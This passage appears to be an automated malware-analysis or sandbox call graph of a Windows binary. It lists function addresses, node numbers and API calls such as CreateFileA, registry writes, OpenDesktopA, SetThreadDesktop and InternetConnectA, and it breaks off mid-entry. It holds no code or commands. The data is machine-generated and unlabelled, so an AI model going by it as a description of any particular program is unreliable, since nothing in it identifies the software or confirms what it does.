API calls 83250->83273 83251->83236 83252->83238 83253->83240 83254->83238 83274 11167f0c GetLastError 83255->83274 83257 11167f8d 83258 1115fb81 83257->83258 83288 11169f7a 62 API calls 83257->83288 83258->83250 83260 1116cc78 83258->83260 83261 1116cc84 83260->83261 83262 11167f85 62 API calls 83261->83262 83263 1116cc89 83262->83263 83264 1116ccb7 83263->83264 83265 1116cc9b 83263->83265 83290 1116cc2b 31 API calls 83264->83290 83266 11167f85 62 API calls 83265->83266 83268 1116cca0 83266->83268 83271 1116ccae 83268->83271 83289 11169f7a 62 API calls 83268->83289 83269 1116ccd2 83291 1116cce5 LeaveCriticalSection 83269->83291 83271->83250 83273->83246 83275 11167dca TlsGetValue DecodePointer TlsSetValue 83274->83275 83276 11167f23 83275->83276 83277 11167f79 SetLastError 83276->83277 83278 1116658e 19 API calls 83276->83278 83277->83257 83279 11167f37 83278->83279 83279->83277 83280 11167f3f DecodePointer 83279->83280 83281 11167f54 83280->83281 83282 11167f70 83281->83282 83283 11167f58 83281->83283 83285 1115f3b5 19 API calls 83282->83285 83284 11167e58 11 API calls 83283->83284 83286 11167f60 GetCurrentThreadId 83284->83286 83287 11167f76 83285->83287 83286->83277 83287->83277 83290->83269 83291->83268 83293 1116779d EnterCriticalSection 83292->83293 83294 1116777b 83292->83294 83295 11167783 83293->83295 83294->83293 83294->83295 83295->83222 83297 111604ed 83296->83297 83298 111604d9 83296->83298 83310 111604e9 83297->83310 83315 11167847 83297->83315 83355 11165abf 23 API calls 83298->83355 83301 111604de 83356 1116a6d4 11 API calls 83301->83356 83307 11160507 83332 1116d7d4 83307->83332 83314 111605a1 LeaveCriticalSection LeaveCriticalSection 83310->83314 83312->83219 83313->83224 83314->83224 83316 11167860 83315->83316 83320 111604f9 83315->83320 83317 11165a57 34 API calls 83316->83317 83316->83320 83318 1116787b 83317->83318 83363 1116ea14 93 API calls 83318->83363 83321 1116d898 83320->83321 83322 11160501 83321->83322 83323 1116d8a8 83321->83323 83325 11165a57 83322->83325 83323->83322 83324 1115f3b5 23 API calls 83323->83324 83324->83322 83326 11165a63 83325->83326 83327 11165a78 83325->83327 83364 11165abf 23 API calls 83326->83364 83327->83307 83329 11165a68 83365 1116a6d4 11 API calls 83329->83365 83331 11165a73 83331->83307 83333 1116d7e0 83332->83333 83334 1116d803 83333->83334 83335 1116d7e8 83333->83335 83336 1116d80f 83334->83336 83342 1116d849 83334->83342 83389 11165ad2 23 API calls 83335->83389 83391 11165ad2 23 API calls 83336->83391 83338 1116d7ed 83390 11165abf 23 API calls 83338->83390 83341 1116d814 83366 111731d2 83342->83366 83355->83301 83356->83310 83363->83320 83364->83329 83365->83331 83368 111731de 83366->83368 83389->83338 83391->83341 83419 11161de8 83418->83419 83420 11140d1c 83418->83420 83419->83420 83424 1116866f 83419->83424 83420->83167 83425 11168684 83424->83425 83426 1116867d 83424->83426 83436 11165abf 23 API calls 83425->83436 83426->83425 83429 111686a2 83426->83429 83430 11161e0d 83429->83430 83438 11165abf 23 API calls 83429->83438 83430->83420 83433 1116a682 83430->83433 83432 11168689 83437 1116a6d4 11 API calls 83432->83437 83439 1116a559 83433->83439 83436->83432 83437->83430 83438->83432 83440 1116a578 83439->83440 83441 1116a596 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 83440->83441 83442 1116a664 83441->83442 83443 1115e4d1 5 API calls 83442->83443 83444 1116a680 GetCurrentProcess TerminateProcess 83443->83444 83444->83420 83445->83146 83449 111606bb 83446->83449 83447 111606ce 83499 11165abf 23 API calls 83447->83499 83449->83447 83451 111606fb 83449->83451 83450 111606d3 83500 1116a6d4 11 API calls 83450->83500 83465 1116dec8 83451->83465 83454 11160700 83455 11160707 83454->83455 83456 11160714 83454->83456 83501 11165abf 23 API calls 83455->83501 83458 1116073b 83456->83458 83459 1116071b 83456->83459 83477 1116dc31 83458->83477 83502 11165abf 23 API calls 83459->83502 83462 111606de 83462->83110 83475 1116ded4 83465->83475 83466 1116df57 83504 1116dff2 83466->83504 83467 1116df5e 83467->83466 83470 1116df73 InitializeCriticalSectionAndSpinCount 83467->83470 83469 1116dfe7 83469->83454 83471 1116dfa6 EnterCriticalSection 83470->83471 83472 1116df93 83470->83472 83471->83466 83474 1115f3b5 23 API calls 83472->83474 83474->83466 83475->83466 83475->83467 83507 111677aa EnterCriticalSection 83475->83507 83508 11167818 LeaveCriticalSection LeaveCriticalSection 83475->83508 83478 1116dc53 83477->83478 83479 1116dc67 83478->83479 83490 1116dc7e 83478->83490 83513 11165abf 23 API calls 83479->83513 83481 1116de1b 83484 1116de81 83481->83484 83485 1116de6f 83481->83485 83482 1116dc6c 83514 1116a6d4 11 API calls 83482->83514 83510 11175ed3 83484->83510 83519 11165abf 23 API calls 83485->83519 83488 11160746 83503 11160761 LeaveCriticalSection LeaveCriticalSection 83488->83503 83489 1116de74 83520 1116a6d4 11 API calls 83489->83520 83490->83481 83490->83485 83515 1117625d 72 API calls 83490->83515 83493 1116ddea 83493->83485 83516 111760f7 81 API calls 83493->83516 83495 1116de14 83495->83481 83517 111760f7 81 API calls 83495->83517 83497 1116de33 83497->83481 83518 111760f7 81 API calls 83497->83518 83499->83450 83500->83462 83501->83462 83502->83462 83503->83462 83509 1116fe36 LeaveCriticalSection 83504->83509 83506 1116dff9 83506->83469 83507->83475 83508->83475 83509->83506 83521 11175e0f 83510->83521 83512 11175eee 83512->83488 83513->83482 83514->83488 83515->83493 83516->83495 83517->83497 83518->83481 83519->83489 83520->83488 83522 11175e1b 83521->83522 83523 11175e2e 83522->83523 83525 11175e64 83522->83525 83641 11165abf 23 API calls 83523->83641 83532 111756db 83525->83532 83526 11175e33 83642 1116a6d4 11 API calls 83526->83642 83529 11175e7e 83643 11175ea5 LeaveCriticalSection 83529->83643 83531 11175e3d 83531->83512 83533 11175702 83532->83533 83644 11178c85 83533->83644 83535 1116a682 10 API calls 83538 11175e0e 83535->83538 83536 1117571e 83537 1117575d 83536->83537 83546 111757b8 83536->83546 83586 1117598d 83536->83586 83664 11165ad2 23 API calls 83537->83664 83540 11175e2e 83538->83540 83544 11175e64 83538->83544 83759 11165abf 23 API calls 83540->83759 83541 11175762 83665 11165abf 23 API calls 83541->83665 83548 111756db 116 API calls 83544->83548 83545 11175e33 83760 1116a6d4 11 API calls 83545->83760 83550 1117583f 83546->83550 83555 11175812 83546->83555 83547 1117576c 83666 1116a6d4 11 API calls 83547->83666 83552 11175e7e 83548->83552 83667 11165ad2 23 API calls 83550->83667 83761 11175ea5 LeaveCriticalSection 83552->83761 83651 11173298 83555->83651 83556 11175844 83668 11165abf 23 API calls 83556->83668 83558 11175e3d 83558->83529 83559 1117584e 83669 1116a6d4 11 API calls 83559->83669 83562 11175776 83562->83529 83563 111758d0 83564 111758fa CreateFileA 83563->83564 83565 111758d9 83563->83565 83567 11175997 GetFileType 83564->83567 83568 11175927 83564->83568 83670 11165ad2 23 API calls 83565->83670 83570 111759a4 GetLastError 83567->83570 83571 111759e8 83567->83571 83572 11175960 GetLastError 83568->83572 83575 1117593b CreateFileA 83568->83575 83569 111758de 83671 11165abf 23 API calls 83569->83671 83675 11165ae5 23 API calls 83570->83675 83677 11173062 24 API calls 83571->83677 83673 11165ae5 23 API calls 83572->83673 83575->83567 83575->83572 83577 11175987 83674 11165abf 23 API calls 83577->83674 83578 111758e8 83672 11165abf 23 API calls 83578->83672 83579 111759cd CloseHandle 83579->83577 83582 111759db 83579->83582 83676 11165abf 23 API calls 83582->83676 83583 11175a06 83588 11175c1c 83583->83588 83589 11175a5c 83583->83589 83593 11175acb 83583->83593 83586->83535 83587 111759e0 83587->83577 83588->83586 83591 11175d84 CloseHandle CreateFileA 83588->83591 83678 111710b6 36 API calls 83589->83678 83594 11175ddf 83591->83594 83595 11175db1 GetLastError 83591->83595 83592 11175a66 83593->83588 83603 11175c25 83593->83603 83614 11175b75 83593->83614 83594->83586 83603->83588 83613 11175c42 83603->83613 83617 11175b99 83603->83617 83608 11175bed 83614->83588 83614->83608 83614->83617 83618 11175bc4 83614->83618 83617->83588 83641->83526 83642->83531 83643->83531 83645 11178ca6 83644->83645 83646 11178c91 83644->83646 83645->83536 83762 11165abf 23 API calls 83646->83762 83648 11178c96 83763 1116a6d4 11 API calls 83648->83763 83650 11178ca1 83650->83536 83655 111732a4 83651->83655 83652 111732b9 83652->83563 83654 111733a0 83765 1116658e 83654->83765 83655->83652 83655->83654 83657 11173348 EnterCriticalSection 83655->83657 83660 1117331e InitializeCriticalSectionAndSpinCount 83655->83660 83663 1117340a 83655->83663 83764 1117336a LeaveCriticalSection 83655->83764 83657->83655 83659 11173358 LeaveCriticalSection 83657->83659 83659->83655 83660->83655 83661 111731d2 3 API calls 83661->83663 83771 11173428 LeaveCriticalSection 83663->83771 83664->83541 83665->83547 83666->83562 83667->83556 83668->83559 83669->83562 83670->83569 83671->83578 83672->83562 83673->83577 83674->83586 83675->83579 83676->83587 83677->83583 83678->83592 83759->83545 83760->83558 83761->83558 83762->83648 83763->83650 83764->83655 83766 11166597 83765->83766 83768 111665d4 83766->83768 83769 111665b5 Sleep 83766->83769 83772 1116c936 83766->83772 83768->83661 83768->83663 83770 111665ca 83769->83770 83770->83766 83770->83768 83771->83652 83773 1116c942 83772->83773 83778 1116c95d 83772->83778 83774 1116c94e 83773->83774 83773->83778 83781 11165abf 23 API calls 83774->83781 83775 1116c970 RtlAllocateHeap 83777 1116c997 83775->83777 83775->83778 83777->83766 83778->83775 83778->83777 83782 11169c78 DecodePointer 83778->83782 83779 1116c953 83779->83766 83781->83779 83782->83778 83803 11062342 83804 11062348 83803->83804 83805 11062425 83804->83805 83807 11062389 83804->83807 83815 1105d470 83804->83815 83821 1105d340 83807->83821 83809 110623bd 83810 110623dc 83809->83810 83812 1105d470 269 API calls 83809->83812 83811 1105d340 75 API calls 83810->83811 83813 1106240c 83811->83813 83812->83810 83813->83805 83814 1105d470 269 API calls 83813->83814 83814->83805 83816 1105d49a 83815->83816 83831 1105d430 83816->83831 83819 1115e4d1 5 API calls 83820 1105d4bb 83819->83820 83820->83807 83822 1105d36f 83821->83822 83823 1105d395 83822->83823 83824 1105d375 83822->83824 83826 1115e4d1 5 API calls 83823->83826 83825 1115fe1b 75 API calls 83824->83825 83827 1105d382 83825->83827 83828 1105d3a2 83826->83828 83829 1115e4d1 5 API calls 83827->83829 83828->83809 83830 1105d38f 83829->83830 83830->83809 83832 1105d43c 83831->83832 83836 110622a0 83832->83836 83839 1105f4e0 83832->83839 83833 1105d464 83833->83819 83883 11060b10 83836->83883 83840 1105f557 EnterCriticalSection 83839->83840 83841 1105f590 83840->83841 83913 11141660 83841->83913 83844 1110c4a0 261 API calls 83845 1105f680 83844->83845 83916 1105e890 83845->83916 83848 1105f6dd 83849 1105f80a 83848->83849 83869 1105f6e7 83848->83869 83851 1105f827 83849->83851 83852 1105f810 83849->83852 83855 1105f86a 83851->83855 83931 1113f670 RegQueryValueExA 83851->83931 83930 110290f0 261 API calls 83852->83930 83859 1105f8af RegSetValueExA 83855->83859 83860 1105f87f 83855->83860 83857 1105f791 83858 1105f7ac LeaveCriticalSection 83857->83858 83861 1105f802 83858->83861 83862 1105f7d3 83858->83862 83859->83857 83866 1105f92a 83859->83866 83864 1105f899 RegDeleteValueA 83860->83864 83865 1105f88f 83860->83865 83873 1105f95e 83861->83873 83875 1105f992 83861->83875 83879 1105f97b 83861->83879 83924 11142a60 83862->83924 83864->83857 83865->83864 83933 110290f0 261 API calls 83866->83933 83868 1115e4d1 5 API calls 83872 1105f9ca 83868->83872 83869->83857 83923 1105f260 82 API calls 83869->83923 83872->83833 83876 11142a60 21 API calls 83873->83876 83873->83879 83878 11142a60 21 API calls 83875->83878 83875->83879 83876->83879 83877 1105f765 83880 1115f3b5 23 API calls 83877->83880 83881 1105f775 83877->83881 83878->83879 83879->83868 83880->83881 83881->83857 83882 1115f3b5 23 API calls 83881->83882 83882->83857 83884 11060b26 83883->83884 83893 11060b5b 83883->83893 83895 11080b10 83884->83895 83885 1105f4e0 269 API calls 83887 11060b83 83885->83887 83887->83833 83888 11060b2e 83889 11060b37 83888->83889 83890 11060b4e 83888->83890 83899 110290f0 261 API calls 83889->83899 83900 11080c50 83890->83900 83893->83885 83896 11080b1c 83895->83896 83898 11080b21 83895->83898 83910 11080a30 IsDBCSLeadByte 83896->83910 83898->83888 83901 11080c5d 83900->83901 83902 11080c62 83900->83902 83911 11080a30 IsDBCSLeadByte 83901->83911 83903 11080c6b 83902->83903 83904 11080c7f 83902->83904 83912 11160e4e 81 API calls 83903->83912 83907 11080ce3 83904->83907 83909 11161f66 81 API calls 83904->83909 83907->83893 83908 11080c78 83908->83893 83909->83904 83910->83898 83911->83902 83912->83908 83934 1113ef50 83913->83934 83917 1105e8a7 83916->83917 83918 1105e8cc 83916->83918 83917->83918 83953 11160e4e 81 API calls 83917->83953 83919 1105e8e3 83918->83919 83954 11160e4e 81 API calls 83918->83954 83919->83848 83922 1105eef0 35 API calls 83919->83922 83922->83848 83923->83877 83925 11142a71 83924->83925 83926 11142a6c 83924->83926 83955 11141f60 83925->83955 83958 11141d10 18 API calls 83926->83958 83932 1113f69a 83931->83932 83932->83855 83935 1113ef60 83934->83935 83935->83935 83936 1110c4a0 261 API calls 83935->83936 83937 1113ef88 83936->83937 83940 1113ee60 83937->83940 83939 1105f661 83939->83844 83941 1113eeb2 83940->83941 83942 1113ee77 83940->83942 83951 1113ed90 MultiByteToWideChar 83941->83951 83943 1115e4d1 5 API calls 83942->83943 83945 1113eeae 83943->83945 83945->83939 83946 1113eee2 83952 1113edd0 WideCharToMultiByte GetLastError 83946->83952 83948 1113eef6 83949 1115e4d1 5 API calls 83948->83949 83950 1113ef09 83949->83950 83950->83939 83951->83946 83952->83948 83953->83917 83954->83919 83959 11141e10 83955->83959 83957 11141f72 83957->83861 83958->83925 83960 11141e34 83959->83960 83961 11141e39 83959->83961 83979 11141d10 18 API calls 83960->83979 83962 11141ea2 83961->83962 83963 11141e42 83961->83963 83965 11141f4e 83962->83965 83966 11141eaf wsprintfA 83962->83966 83967 11141e79 83963->83967 83969 11141e50 83963->83969 83970 1115e4d1 5 API calls 83965->83970 83968 11141ed2 83966->83968 83973 1115e4d1 5 API calls 83967->83973 83968->83968 83971 11141ed9 wvsprintfA 83968->83971 83975 1115e4d1 5 API calls 83969->83975 83972 11141f5a 83970->83972 83978 11141ef4 83971->83978 83972->83957 83974 11141e9e 83973->83974 83974->83957 83976 11141e75 83975->83976 83976->83957 83977 11141f41 OutputDebugStringA 83977->83965 83978->83977 83978->83978 83979->83961 83980 11030444 GetModuleHandleA GetProcAddress 83981 11030461 GetNativeSystemInfo 83980->83981 83983 1103046d 83980->83983 83981->83983 83982 1110c420 261 API calls 83985 11030414 83982->83985 83984 1103040d 83983->83984 83987 110304d1 83983->83987 83984->83982 83996 11030430 GetStockObject GetObjectA 83984->83996 84048 11105d40 83985->84048 83989 1110c420 261 API calls 83987->83989 83988 11030696 SetErrorMode SetErrorMode 83993 1110c420 261 API calls 83988->83993 83992 110304d8 83989->83992 84178 110f8130 268 API calls 83992->84178 83994 110306d2 83993->83994 84091 11027fe0 83994->84091 83996->83988 83998 110306ec 83999 1110c420 261 API calls 83998->83999 84000 11030712 83999->84000 84001 11027fe0 264 API calls 84000->84001 84002 1103072b InterlockedExchange 84001->84002 84004 1110c420 261 API calls 84002->84004 84005 11030753 84004->84005 84094 11089840 84005->84094 84007 1103076b GetACP 84105 1115f8a3 84007->84105 84012 1103079c 84148 1113f220 84012->84148 84015 1110c420 261 API calls 84049 1110c420 261 API calls 84048->84049 84050 11105da1 84049->84050 84051 11105db9 OpenEventA 84050->84051 84194 111042a0 84050->84194 84054 11105ee1 GetStockObject GetObjectA InitializeCriticalSection InitializeCriticalSection 84051->84054 84055 11105e28 CloseHandle GetSystemDirectoryA 84051->84055 84057 1110c420 261 API calls 84054->84057 84056 11105e48 84055->84056 84056->84056 84058 11105e50 LoadLibraryA 84056->84058 84059 11105f33 84057->84059 84058->84054 84060 11105e81 84058->84060 84061 11105f4c 84059->84061 84262 110f23a0 264 API calls 84059->84262 84229 11141710 84060->84229 84213 1110c2b0 84061->84213 84065 11105e8b 84067 11105e92 GetProcAddress 84065->84067 84068 11105eaa GetProcAddress 84065->84068 84067->84068 84070 11105ed4 FreeLibrary 84068->84070 84071 11105ec6 84068->84071 84070->84054 84071->84054 84073 11106015 84075 1115e4d1 5 API calls 84073->84075 84074 1110c420 261 API calls 84076 11105f83 84074->84076 84077 1110602f 84075->84077 84078 11105f94 84076->84078 84079 11105f9d 84076->84079 84077->83996 84263 110f23a0 264 API calls 84078->84263 84081 1110c2b0 420 API calls 84079->84081 84082 11105fb9 CloseHandle 84081->84082 84083 11141710 86 API calls 84082->84083 84084 11105fca 84083->84084 84084->84073 84085 1110c420 261 API calls 84084->84085 84086 11105fd8 84085->84086 84087 11105ff2 84086->84087 84264 110f23a0 264 API calls 84086->84264 84089 1110c2b0 420 API calls 84087->84089 84090 1110600e CloseHandle 84089->84090 84090->84073 84092 110879a0 264 API calls 84091->84092 84093 11027feb 84092->84093 84093->83998 84095 1110c420 261 API calls 84094->84095 84096 11089877 84095->84096 84097 11089899 InitializeCriticalSection 84096->84097 84098 1110c420 261 API calls 84096->84098 84101 110898fa 84097->84101 84100 11089892 84098->84100 84100->84097 84711 1115e96a 34 API calls 84100->84711 84101->84007 84103 110898c9 84712 1115edc1 RaiseException 84103->84712 84106 1115f8d6 84105->84106 84107 1115f8c1 84105->84107 84106->84107 84109 1115f8dd 84106->84109 84713 11165abf 23 API calls 84107->84713 84715 1116bbed 96 API calls 84109->84715 84110 1115f8c6 84714 1116a6d4 11 API calls 84110->84714 84113 1115f903 84114 11030792 84113->84114 84716 1116b9f4 93 API calls 84113->84716 84116 11161c63 84114->84116 84117 11161c6f 84116->84117 84118 11161c90 84117->84118 84119 11161c79 84117->84119 84120 11167f85 62 API calls 84118->84120 84742 11165abf 23 API calls 84119->84742 84122 11161c95 84120->84122 84124 1116cc78 70 API calls 84122->84124 84123 11161c7e 84743 1116a6d4 11 API calls 84123->84743 84126 11161c9f 84124->84126 84127 1116658e 23 API calls 84126->84127 84129 11161cb5 84127->84129 84128 11161c89 84128->84012 84129->84128 84717 111610d4 84129->84717 84878 1113f130 84148->84878 84150 1113f235 84151 110307c8 84150->84151 84152 1113f130 IsDBCSLeadByte 84150->84152 84153 11161f66 81 API calls 84150->84153 84151->84015 84152->84150 84153->84150 84178->83996 84265 1110c520 84194->84265 84197 1110c520 3 API calls 84198 111042ec 84197->84198 84199 1110c520 3 API calls 84198->84199 84200 111042fe 84199->84200 84201 1110c520 3 API calls 84200->84201 84202 1110430f 84201->84202 84203 1110c520 3 API calls 84202->84203 84204 11104320 84203->84204 84205 1110c420 261 API calls 84204->84205 84206 11104331 84205->84206 84207 1110441a 84206->84207 84208 1110433c LoadLibraryA LoadLibraryA 84206->84208 84272 1115e96a 34 API calls 84207->84272 84208->84051 84210 11104429 84273 1115edc1 RaiseException 84210->84273 84212 1110443e 84214 1110c2d0 CreateThread 84213->84214 84215 1110c2bf CreateEventA 84213->84215 84217 1110c2f6 84214->84217 84218 1110c30d 84214->84218 84277 1110cd70 84214->84277 84291 11026ee0 84214->84291 84316 1102c030 84214->84316 84351 110ffe60 84214->84351 84215->84214 84276 110290f0 261 API calls 84217->84276 84220 1110c311 WaitForSingleObject CloseHandle 84218->84220 84221 11105f68 CloseHandle 84218->84221 84220->84221 84223 1109dcf0 84221->84223 84224 1109dcff GetCurrentProcess OpenProcessToken 84223->84224 84225 1109dd3d 84223->84225 84224->84225 84226 1109dd22 84224->84226 84225->84073 84225->84074 84680 1109dc20 84226->84680 84228 1109dd2b CloseHandle 84228->84225 84230 11141731 GetVersionExA 84229->84230 84239 1114190c 84229->84239 84232 11141753 84230->84232 84230->84239 84231 11141915 84234 1115e4d1 5 API calls 84231->84234 84233 11141760 RegOpenKeyExA 84232->84233 84232->84239 84235 1114178d 84233->84235 84233->84239 84236 11141922 84234->84236 84241 1113f670 RegQueryValueExA 84235->84241 84236->84065 84237 11141974 84238 1115e4d1 5 API calls 84237->84238 84240 11141984 84238->84240 84239->84231 84239->84237 84698 11080d00 84239->84698 84240->84065 84242 111417cf 84241->84242 84244 1113f670 RegQueryValueExA 84242->84244 84246 111417f9 84244->84246 84245 1114195c 84245->84231 84248 1115f5b7 75 API calls 84245->84248 84247 111418ff RegCloseKey 84246->84247 84249 1115f5b7 75 API calls 84246->84249 84247->84239 84250 1114196d 84248->84250 84251 1114180e 84249->84251 84250->84231 84250->84237 84693 111601fd 84251->84693 84253 1114181d 84254 11141836 84253->84254 84255 111601fd 75 API calls 84253->84255 84256 1115f5b7 75 API calls 84254->84256 84255->84253 84257 11141842 84256->84257 84258 1113f670 RegQueryValueExA 84257->84258 84261 111418e1 84257->84261 84259 111418b8 84258->84259 84260 1113f670 RegQueryValueExA 84259->84260 84260->84261 84261->84247 84262->84061 84263->84079 84264->84087 84266 1110c536 CreateEventA 84265->84266 84267 1110c549 84265->84267 84266->84267 84271 1110c557 84267->84271 84274 1110c260 InterlockedIncrement 84267->84274 84268 111042dc 84268->84197 84271->84268 84275 1110c3c0 InterlockedIncrement 84271->84275 84272->84210 84273->84212 84274->84271 84275->84268 84373 110b6cd0 84277->84373 84279 1110cd7e GetCurrentThreadId 84375 1110c340 84279->84375 84281 1110ce10 84382 1110c370 SetEvent PulseEvent 84281->84382 84283 1110cdb0 WaitForSingleObject 84380 1110cba0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 84283->84380 84284 1110ce1a 84286 1110cdd3 84287 1110cde3 PostMessageA 84286->84287 84288 1110cde8 PostThreadMessageA 84286->84288 84289 1110cd99 84287->84289 84288->84289 84289->84281 84289->84283 84289->84286 84381 1110cba0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 84289->84381 84292 11026f12 84291->84292 84293 110883c0 5 API calls 84292->84293 84294 11026f19 CreateEventA 84293->84294 84295 1110c420 261 API calls 84294->84295 84296 11026f36 84295->84296 84297 11026f57 84296->84297 84384 1110d060 84296->84384 84299 1110c340 262 API calls 84297->84299 84307 11026f6f 84299->84307 84300 11026f86 WaitForMultipleObjects 84301 11026f9d 84300->84301 84300->84307 84302 11026fa6 PostMessageA 84301->84302 84303 11026fba SetEvent Sleep 84301->84303 84302->84303 84302->84307 84303->84307 84304 11027064 84306 1102707e CloseHandle 84304->84306 84413 1110cc00 274 API calls 84304->84413 84305 11026fe5 PostMessageA 84305->84307 84414 1110c370 SetEvent PulseEvent 84306->84414 84307->84300 84307->84304 84307->84305 84313 1102702a GetCurrentThreadId GetThreadDesktop 84307->84313 84412 11026ec0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 84307->84412 84310 11027075 84310->84306 84311 11027093 84313->84307 84314 11027039 SetThreadDesktop 84313->84314 84314->84307 84315 11027044 CloseDesktop 84314->84315 84315->84307 84317 1102c062 84316->84317 84318 1110c340 262 API calls 84317->84318 84319 1102c06f WaitForSingleObject 84318->84319 84320 1102c086 84319->84320 84321 1102c29d 84319->84321 84323 1102c090 GetTickCount 84320->84323 84324 1102c286 WaitForSingleObject 84320->84324 84502 1110c370 SetEvent PulseEvent 84321->84502 84418 110cf410 84323->84418 84324->84320 84324->84321 84325 1102c2a4 CloseHandle 84503 1110c580 InterlockedDecrement SetEvent PulseEvent InterlockedDecrement CloseHandle 84325->84503 84328 1102c2b5 84329 110cf410 264 API calls 84340 1102c0a6 84329->84340 84331 1102c2d4 84504 110290f0 261 API calls 84331->84504 84333 1102c2e8 84505 110290f0 261 API calls 84333->84505 84335 1102c2fc 84506 110290f0 261 API calls 84335->84506 84338 1102c310 84507 110290f0 261 API calls 84338->84507 84339 1102c194 GetTickCount 84349 1102c191 84339->84349 84340->84329 84340->84331 84340->84333 84340->84335 84340->84339 84428 110ce440 84340->84428 84440 11029230 LoadLibraryA 84340->84440 84491 110cf0a0 265 API calls 84340->84491 84344 11142a60 21 API calls 84344->84349 84345 110ce4f0 261 API calls 84345->84349 84346 1113e8f0 261 API calls 84346->84349 84349->84331 84349->84333 84349->84338 84349->84339 84349->84344 84349->84345 84349->84346 84350 11066f60 294 API calls 84349->84350 84492 11041cc0 263 API calls 84349->84492 84493 110ce4f0 84349->84493 84350->84349 84352 110883c0 5 API calls 84351->84352 84353 110ffe6d 84352->84353 84354 110ffe79 GetCurrentThreadId GetThreadDesktop OpenDesktopA 84353->84354 84355 110ffedf GetLastError 84354->84355 84356 110ffe9f SetThreadDesktop 84354->84356 84357 11142a60 21 API calls 84355->84357 84358 110ffeaa 84356->84358 84359 110ffec1 GetLastError 84356->84359 84361 110ffef1 84357->84361 84362 11142a60 21 API calls 84358->84362 84360 11142a60 21 API calls 84359->84360 84363 110ffed3 CloseDesktop 84360->84363 84652 110ffde0 84361->84652 84364 110ffeb5 CloseDesktop 84362->84364 84363->84361 84364->84361 84366 110ffefb 84367 1110c340 262 API calls 84366->84367 84368 110fff02 84367->84368 84658 110f2460 16 API calls 84368->84658 84370 110fff09 84659 1110c370 SetEvent PulseEvent 84370->84659 84372 110fff10 84374 110b6cd8 84373->84374 84374->84279 84376 1110c360 SetEvent 84375->84376 84377 1110c349 84375->84377 84376->84289 84383 110290f0 261 API calls 84377->84383 84380->84289 84381->84289 84382->84284 84385 1110c420 261 API calls 84384->84385 84386 1110d091 84385->84386 84387 1110d0b3 GetCurrentThreadId InitializeCriticalSection 84386->84387 84388 1110c420 261 API calls 84386->84388 84391 1110d120 EnterCriticalSection 84387->84391 84392 1110d113 InitializeCriticalSection 84387->84392 84390 1110d0ac 84388->84390 84390->84387 84415 1115e96a 34 API calls 84390->84415 84393 1110d1da LeaveCriticalSection 84391->84393 84394 1110d14e CreateEventA 84391->84394 84392->84391 84393->84297 84396 1110d161 84394->84396 84397 1110d178 84394->84397 84417 110290f0 261 API calls 84396->84417 84398 1110c420 261 API calls 84397->84398 84402 1110d17f 84398->84402 84399 1110d0cf 84416 1115edc1 RaiseException 84399->84416 84404 1110d19c 84402->84404 84405 1110d060 414 API calls 84402->84405 84406 1110c420 261 API calls 84404->84406 84405->84404 84407 1110d1ac 84406->84407 84408 1110d1bd 84407->84408 84409 1110c520 3 API calls 84407->84409 84410 1110c2b0 414 API calls 84408->84410 84409->84408 84411 1110d1d5 84410->84411 84411->84393 84412->84307 84413->84310 84414->84311 84415->84399 84416->84387 84508 110cf1b0 84418->84508 84421 110cf45b 84423 110cf475 84421->84423 84424 110cf458 84421->84424 84422 110cf444 84522 110290f0 261 API calls 84422->84522 84423->84340 84424->84421 84523 110290f0 261 API calls 84424->84523 84429 110ce454 84428->84429 84430 11161dd7 34 API calls 84429->84430 84431 110ce45f 84430->84431 84432 110ce180 261 API calls 84431->84432 84484 110292c1 84440->84484 84441 110292f3 GetProcAddress 84444 11029311 SetLastError 84441->84444 84441->84484 84442 110293e8 InternetOpenA 84442->84484 84443 110293cf GetProcAddress 84443->84442 84445 11029419 SetLastError 84443->84445 84444->84484 84445->84484 84446 11029345 GetProcAddress 84447 11029402 SetLastError 84446->84447 84446->84484 84448 11029372 GetLastError 84447->84448 84448->84484 84449 1113e8f0 261 API calls 84449->84484 84450 1115f3b5 23 API calls 84450->84484 84451 11029395 GetProcAddress 84452 1102940f SetLastError 84451->84452 84451->84484 84452->84484 84453 110296e0 84457 11029816 GetProcAddress 84453->84457 84458 110296d1 84453->84458 84454 11029850 84454->84349 84455 11029849 FreeLibrary 84455->84454 84456 110296f7 GetProcAddress 84459 110297ce SetLastError 84456->84459 84462 110296ba 84456->84462 84457->84458 84458->84454 84458->84455 84480 110297d6 84459->84480 84461 11080b10 IsDBCSLeadByte 84461->84484 84462->84453 84462->84456 84462->84458 84479 11029728 84462->84479 84462->84480 84465 1110c4a0 261 API calls 84465->84479 84467 1102949f GetProcAddress 84471 110294bc SetLastError 84467->84471 84467->84484 84468 110294cb GetProcAddress 84469 110294de InternetConnectA 84468->84469 84473 11029521 SetLastError 84468->84473 84469->84484 84471->84484 84473->84484 84474 11029504 GetProcAddress 84476 11029531 SetLastError 84474->84476 84474->84484 84475 11029543 GetProcAddress 84477 11029576 SetLastError 84475->84477 84475->84484 84476->84484 84477->84484 84478 110cedc0 264 API calls 84478->84479 84479->84462 84479->84465 84479->84478 84479->84480 84644 110274c0 GetProcAddress SetLastError 84479->84644 84645 11027510 GetProcAddress SetLastError 84480->84645 84481 11029591 GetProcAddress 84482 110295b8 SetLastError 84481->84482 84481->84484 84483 110295c2 GetLastError 84482->84483 84483->84484 84485 110295dd GetProcAddress 84483->84485 84484->84441 84484->84442 84484->84443 84484->84446 84484->84448 84484->84449 84484->84450 84484->84451 84484->84461 84484->84462 84484->84467 84484->84468 84484->84469 84484->84474 84484->84475 84484->84481 84484->84483 84487 11029615 GetLastError 84484->84487 84488 1102962c GetDesktopWindow 84484->84488 84485->84484 84486 1102960d SetLastError 84485->84486 84486->84487 84487->84484 84487->84488 84488->84484 84489 1102963a GetProcAddress 84488->84489 84489->84484 84490 11029676 SetLastError 84489->84490 84490->84484 84491->84340 84492->84349 84647 110ce2f0 84493->84647 84502->84325 84503->84328 84509 110cf1bc 84508->84509 84510 110cf1d7 84509->84510 84511 110cf1c0 84509->84511 84524 110cdeb0 84510->84524 84553 110290f0 261 API calls 84511->84553 84518 110cf20e 84518->84421 84518->84422 84519 110cf1f7 84554 110290f0 261 API calls 84519->84554 84525 110cdeb9 84524->84525 84526 110cdebd 84525->84526 84527 110cded4 84525->84527 84555 110290f0 261 API calls 84526->84555 84529 110cded1 84527->84529 84530 110cdf08 84527->84530 84529->84527 84556 110290f0 261 API calls 84529->84556 84532 110cdf05 84530->84532 84533 